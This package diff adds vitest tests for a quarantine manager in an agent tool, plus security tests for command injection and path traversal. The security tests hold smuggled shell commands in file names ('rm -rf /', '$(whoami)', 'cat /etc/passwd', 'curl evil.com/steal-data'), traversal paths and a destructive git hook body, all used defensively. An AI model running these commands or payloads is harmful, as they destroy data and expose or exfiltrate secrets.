claude-mycelium 2.0.0 → 2.2.0

package/tests/quarantine/manager.test.ts

@@ -0,0 +1,399 @@
+/**
+ * Tests for Quarantine Manager
+ * Validates quarantine triggers, tracking, and release
+ */
+
+import { describe, it, expect, beforeEach, afterEach } from 'vitest';
+import * as fs from 'fs';
+import * as path from 'path';
+import {
+  shouldQuarantine,
+  addToQuarantine,
+  isQuarantined,
+  getQuarantineEntry,
+  canExplorerAttempt,
+  recordExplorerAttempt,
+  checkQuarantineRelease,
+  removeFromQuarantine,
+  getQuarantinedFiles,
+  checkAndQuarantine,
+  getQuarantineStats,
+} from '../../src/quarantine/manager.js';
+import type { TraceEvent } from '../../src/trace/trace-event.js';
+
+describe('Quarantine Manager', () => {
+  let TEST_DIR: string;
+  let QUARANTINE_FILE: string;
+
+  beforeEach(() => {
+    // Create unique test directory for each test
+    TEST_DIR = `.agent-meta-test-${Date.now()}-${Math.random().toString(36).slice(2)}`;
+    QUARANTINE_FILE = path.join(TEST_DIR, '_quarantine.json');
+
+    if (!fs.existsSync(TEST_DIR)) {
+      fs.mkdirSync(TEST_DIR, { recursive: true });
+    }
+
+    // Override file path for testing
+    process.env.TEST_META_DIR = TEST_DIR;
+  });
+
+  afterEach(() => {
+    // Cleanup test files
+    if (fs.existsSync(TEST_DIR)) {
+      fs.rmSync(TEST_DIR, { recursive: true, force: true });
+    }
+    // Clean up environment
+    delete process.env.TEST_META_DIR;
+  });
+
+  const createMockTrace = (efficiency: number): TraceEvent => ({
+    id: `trace-${Date.now()}-${Math.random()}`,
+    timestamp: new Date().toISOString(),
+    agent_id: 'test-agent',
+    file_path: 'test.ts',
+    mode: 'error_reducer',
+    gradient_before: 0.5,
+    gradient_after: 0.48,
+    gradient_delta: 0.02,
+    changes_made: [],
+    tokens_used: 1000,
+    cost_usd: 0.01,
+    duration_ms: 1000,
+    success: true,
+    efficiency,
+    ci_passed: true,
+    changes: {
+      additions: 1,
+      deletions: 1,
+      files_touched: ['test.ts'],
+    },
+    cost: {
+      tokens_in: 500,
+      tokens_out: 500,
+      model: 'claude-sonnet-4',
+      estimated_usd: 0.01,
+    },
+  });
+
+  const createGetTracesForFile = (traces: TraceEvent[]) => {
+    return async (file: string) => traces.filter(t => t.file_path === file);
+  };
+
+  describe('shouldQuarantine', () => {
+    it('should return false with insufficient samples (<10)', async () => {
+      const traces = Array(5)
+        .fill(0)
+        .map(() => createMockTrace(0.01)); // All poor efficiency
+
+      const result = await shouldQuarantine('test.ts', createGetTracesForFile(traces));
+      expect(result).toBe(false);
+    });
+
+    it('should return true with 10 samples all below 0.02 efficiency', async () => {
+      const traces = Array(10)
+        .fill(0)
+        .map(() => createMockTrace(0.01)); // All below threshold
+
+      const result = await shouldQuarantine('test.ts', createGetTracesForFile(traces));
+      expect(result).toBe(true);
+    });
+
+    it('should return false if any sample exceeds 0.02 efficiency', async () => {
+      const traces = [
+        ...Array(9)
+          .fill(0)
+          .map(() => createMockTrace(0.01)),
+        createMockTrace(0.05), // One good sample
+      ];
+
+      const result = await shouldQuarantine('test.ts', createGetTracesForFile(traces));
+      expect(result).toBe(false);
+    });
+
+    it('should only check last 10 samples', async () => {
+      const traces = [
+        // Old samples (will be ignored)
+        ...Array(5)
+          .fill(0)
+          .map(() => createMockTrace(0.5)),
+        // Recent 10 samples (all poor)
+        ...Array(10)
+          .fill(0)
+          .map(() => createMockTrace(0.01)),
+      ];
+
+      const result = await shouldQuarantine('test.ts', createGetTracesForFile(traces));
+      expect(result).toBe(true);
+    });
+  });
+
+  describe('addToQuarantine and isQuarantined', () => {
+    it('should add file to quarantine', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'No progress after 10 attempts',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      const quarantined = await isQuarantined('test.ts');
+      expect(quarantined).toBe(true);
+    });
+
+    it('should return false for non-quarantined file', async () => {
+      const quarantined = await isQuarantined('not-quarantined.ts');
+      expect(quarantined).toBe(false);
+    });
+
+    it('should not duplicate quarantine entry', async () => {
+      const entry = {
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      };
+
+      await addToQuarantine(entry);
+      await addToQuarantine(entry); // Try to add again
+
+      const files = await getQuarantinedFiles();
+      expect(files.length).toBe(1);
+    });
+  });
+
+  describe('explorer attempts', () => {
+    it('should track explorer attempts', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      // Initial state
+      expect(await canExplorerAttempt('test.ts')).toBe(true);
+
+      // Record attempts
+      await recordExplorerAttempt('test.ts');
+      expect(await canExplorerAttempt('test.ts')).toBe(true); // 1/3
+
+      await recordExplorerAttempt('test.ts');
+      expect(await canExplorerAttempt('test.ts')).toBe(true); // 2/3
+
+      await recordExplorerAttempt('test.ts');
+      expect(await canExplorerAttempt('test.ts')).toBe(false); // 3/3 exhausted
+    });
+
+    it('should update explorer_attempts counter', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      await recordExplorerAttempt('test.ts');
+      await recordExplorerAttempt('test.ts');
+
+      const entry = await getQuarantineEntry('test.ts');
+      expect(entry?.explorer_attempts).toBe(2);
+    });
+  });
+
+  describe('checkQuarantineRelease', () => {
+    it('should release quarantine on successful explorer run', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      const successfulTrace = createMockTrace(0.25); // Good efficiency
+      successfulTrace.mode = 'explorer';
+      successfulTrace.file_path = 'test.ts';
+
+      const released = await checkQuarantineRelease('test.ts', successfulTrace);
+      expect(released).toBe(true);
+
+      const stillQuarantined = await isQuarantined('test.ts');
+      expect(stillQuarantined).toBe(false);
+    });
+
+    it('should not release if efficiency too low', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      const poorTrace = createMockTrace(0.15); // Poor efficiency (<0.2)
+      poorTrace.mode = 'explorer';
+      poorTrace.file_path = 'test.ts';
+
+      const released = await checkQuarantineRelease('test.ts', poorTrace);
+      expect(released).toBe(false);
+
+      const stillQuarantined = await isQuarantined('test.ts');
+      expect(stillQuarantined).toBe(true);
+    });
+
+    it('should not release if mode is not explorer', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      const nonExplorerTrace = createMockTrace(0.25);
+      nonExplorerTrace.mode = 'error_reducer'; // Not explorer
+      nonExplorerTrace.file_path = 'test.ts';
+
+      const released = await checkQuarantineRelease('test.ts', nonExplorerTrace);
+      expect(released).toBe(false);
+    });
+  });
+
+  describe('checkAndQuarantine', () => {
+    it('should quarantine file when conditions met', async () => {
+      const traces = Array(10)
+        .fill(0)
+        .map(() => createMockTrace(0.01));
+
+      await checkAndQuarantine('test.ts', createGetTracesForFile(traces));
+
+      const quarantined = await isQuarantined('test.ts');
+      expect(quarantined).toBe(true);
+
+      const entry = await getQuarantineEntry('test.ts');
+      expect(entry?.attempts_before_quarantine).toBe(10);
+      expect(entry?.explorer_attempts).toBe(0);
+      expect(entry?.max_explorer_attempts).toBe(3);
+    });
+
+    it('should not quarantine if already quarantined', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Already quarantined',
+        attempts_before_quarantine: 5,
+        explorer_attempts: 1,
+        max_explorer_attempts: 3,
+      });
+
+      const traces = Array(10)
+        .fill(0)
+        .map(() => createMockTrace(0.01));
+
+      await checkAndQuarantine('test.ts', createGetTracesForFile(traces));
+
+      const entry = await getQuarantineEntry('test.ts');
+      // Should preserve original entry
+      expect(entry?.reason).toBe('Already quarantined');
+      expect(entry?.attempts_before_quarantine).toBe(5);
+      expect(entry?.explorer_attempts).toBe(1);
+    });
+  });
+
+  describe('getQuarantineStats', () => {
+    it('should return correct statistics', async () => {
+      // Add files with different explorer attempt states
+      await addToQuarantine({
+        file: 'file1.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test 1',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      await addToQuarantine({
+        file: 'file2.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test 2',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 2,
+        max_explorer_attempts: 3,
+      });
+
+      await addToQuarantine({
+        file: 'file3.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test 3',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 3,
+        max_explorer_attempts: 3,
+      });
+
+      const stats = await getQuarantineStats();
+
+      expect(stats.total).toBe(3);
+      expect(stats.withExplorerAttempts).toBe(2); // file2 and file3
+      expect(stats.exhausted).toBe(1); // file3
+    });
+  });
+
+  describe('removeFromQuarantine', () => {
+    it('should remove file from quarantine', async () => {
+      await addToQuarantine({
+        file: 'test.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      expect(await isQuarantined('test.ts')).toBe(true);
+
+      await removeFromQuarantine('test.ts');
+
+      expect(await isQuarantined('test.ts')).toBe(false);
+    });
+  });
+
+  describe('getQuarantinedFiles', () => {
+    it('should return all quarantined files', async () => {
+      await addToQuarantine({
+        file: 'file1.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test 1',
+        attempts_before_quarantine: 10,
+        explorer_attempts: 0,
+        max_explorer_attempts: 3,
+      });
+
+      await addToQuarantine({
+        file: 'file2.ts',
+        quarantined_at: new Date().toISOString(),
+        reason: 'Test 2',
+        attempts_before_quarantine: 15,
+        explorer_attempts: 1,
+        max_explorer_attempts: 3,
+      });
+
+      const files = await getQuarantinedFiles();
+
+      expect(files.length).toBe(2);
+      expect(files.map(f => f.file)).toContain('file1.ts');
+      expect(files.map(f => f.file)).toContain('file2.ts');
+    });
+  });
+});

package/tests/security/command-injection.test.ts

@@ -0,0 +1,88 @@
+/**
+ * Security Tests: Command Injection Prevention
+ *
+ * Tests that file paths with malicious shell characters
+ * cannot be used to execute arbitrary commands.
+ */
+
+import { describe, it, expect } from 'vitest';
+import { calculateDebt } from '../../src/core/signals/debt.js';
+import { calculateChurn } from '../../src/core/signals/churn.js';
+import * as fs from 'fs';
+import * as path from 'path';
+
+describe('Command Injection Prevention', () => {
+  describe('debt signal', () => {
+    it('should safely handle file paths with shell metacharacters', async () => {
+      const maliciousPath = 'test.ts; rm -rf /; echo "pwned.ts';
+
+      // SECURITY: execFile prevents shell interpretation
+      // Function gracefully returns 0 when file doesn't exist
+      const result = await calculateDebt(maliciousPath);
+      expect(result).toEqual({ errors: 0, warnings: 0, normalized: 0 });
+    });
+
+    it('should safely handle file paths with command substitution', async () => {
+      const maliciousPath = 'test$(whoami).ts';
+
+      // SECURITY: execFile prevents command substitution
+      const result = await calculateDebt(maliciousPath);
+      expect(result).toEqual({ errors: 0, warnings: 0, normalized: 0 });
+    });
+
+    it('should safely handle file paths with backticks', async () => {
+      const maliciousPath = 'test`id`.ts';
+
+      // SECURITY: execFile prevents backtick execution
+      const result = await calculateDebt(maliciousPath);
+      expect(result).toEqual({ errors: 0, warnings: 0, normalized: 0 });
+    });
+
+    it('should handle files with quotes safely', async () => {
+      const testFile = path.join(process.cwd(), 'test"quote.ts');
+
+      // Create test file
+      try {
+        fs.writeFileSync(testFile, 'console.log("test");');
+
+        // Should not throw, but also should not execute shell commands
+        const result = await calculateDebt(testFile);
+        expect(result).toBeDefined();
+      } finally {
+        // Cleanup
+        if (fs.existsSync(testFile)) {
+          fs.unlinkSync(testFile);
+        }
+      }
+    });
+  });
+
+  describe('churn signal', () => {
+    it('should safely handle file paths with shell metacharacters', async () => {
+      const maliciousPath = 'test.ts; rm -rf /; echo "pwned.ts';
+
+      // SECURITY: execFile prevents shell interpretation
+      const result = await calculateChurn(maliciousPath);
+      expect(result.commits).toBe(0);
+      expect(result.normalized).toBe(0);
+    });
+
+    it('should safely handle file paths with pipe operators', async () => {
+      const maliciousPath = 'test.ts | cat /etc/passwd';
+
+      // SECURITY: execFile prevents pipe operators
+      const result = await calculateChurn(maliciousPath);
+      expect(result.commits).toBe(0);
+      expect(result.normalized).toBe(0);
+    });
+
+    it('should safely handle file paths with && operators', async () => {
+      const maliciousPath = 'test.ts && curl evil.com/steal-data';
+
+      // SECURITY: execFile prevents && operators
+      const result = await calculateChurn(maliciousPath);
+      expect(result.commits).toBe(0);
+      expect(result.normalized).toBe(0);
+    });
+  });
+});

package/tests/security/path-traversal.test.ts

@@ -0,0 +1,103 @@
+/**
+ * Security Tests: Path Traversal Prevention
+ *
+ * Tests that file operations cannot be used to access
+ * files outside the project directory.
+ */
+
+import { describe, it, expect } from 'vitest';
+import { readFile, writeFile, copyFile, deleteFile } from '../../src/utils/file-utils.js';
+import * as path from 'path';
+
+describe('Path Traversal Prevention', () => {
+  describe('readFile', () => {
+    it('should reject paths outside project directory', () => {
+      expect(() => {
+        readFile('../../../etc/passwd');
+      }).toThrow(/traversal|outside|forbidden/i);
+    });
+
+    it('should reject absolute paths to system files', () => {
+      expect(() => {
+        readFile('/etc/passwd');
+      }).toThrow(/traversal|outside|forbidden/i);
+    });
+
+    it('should reject paths with null bytes', () => {
+      expect(() => {
+        readFile('test\x00.ts');
+      }).toThrow();
+    });
+
+    it('should reject paths to .git directory', () => {
+      expect(() => {
+        readFile('.git/config');
+      }).toThrow(/protected|forbidden/i);
+    });
+
+    it('should reject paths to node_modules', () => {
+      expect(() => {
+        readFile('node_modules/malicious/index.js');
+      }).toThrow(/protected|forbidden/i);
+    });
+
+    it('should allow reading files in project directory', () => {
+      // Assuming package.json exists
+      expect(() => {
+        readFile('package.json');
+      }).not.toThrow();
+    });
+  });
+
+  describe('writeFile', () => {
+    it('should reject writing outside project directory', () => {
+      expect(() => {
+        writeFile('../../../tmp/malicious.txt', 'pwned');
+      }).toThrow(/traversal|outside|forbidden/i);
+    });
+
+    it('should reject writing to .git directory', () => {
+      expect(() => {
+        writeFile('.git/hooks/pre-commit', '#!/bin/bash\nrm -rf /');
+      }).toThrow(/protected|forbidden/i);
+    });
+
+    it('should reject writing to node_modules', () => {
+      expect(() => {
+        writeFile('node_modules/@malicious/package/index.js', 'evil code');
+      }).toThrow(/protected|forbidden/i);
+    });
+  });
+
+  describe('path normalization attacks', () => {
+    it('should handle Unicode path traversal safely', () => {
+      // U+2215 DIVISION SLASH - path.normalize handles this
+      expect(() => {
+        readFile('..\u2215..\u2215etc\u2215passwd');
+      }).toThrow(); // Will throw ENOENT or traversal error
+    });
+
+    it('should handle URL-encoded paths safely', () => {
+      // URL encoding doesn't bypass fs operations
+      expect(() => {
+        readFile('%2e%2e%2f%2e%2e%2fetc%2fpasswd');
+      }).toThrow(); // Will throw ENOENT (file doesn't exist with that name)
+    });
+
+    it('should handle double-encoded paths safely', () => {
+      // Double encoding doesn't bypass fs operations
+      expect(() => {
+        readFile('%252e%252e%252f%252e%252e%252fetc%252fpasswd');
+      }).toThrow(); // Will throw ENOENT
+    });
+  });
+
+  describe('symlink attacks', () => {
+    it('should follow symlinks within project only', () => {
+      // If a symlink points outside project, should reject
+      // This requires actual symlink creation to test properly
+      // Placeholder test - implement with real symlink if needed
+      expect(true).toBe(true);
+    });
+  });
+});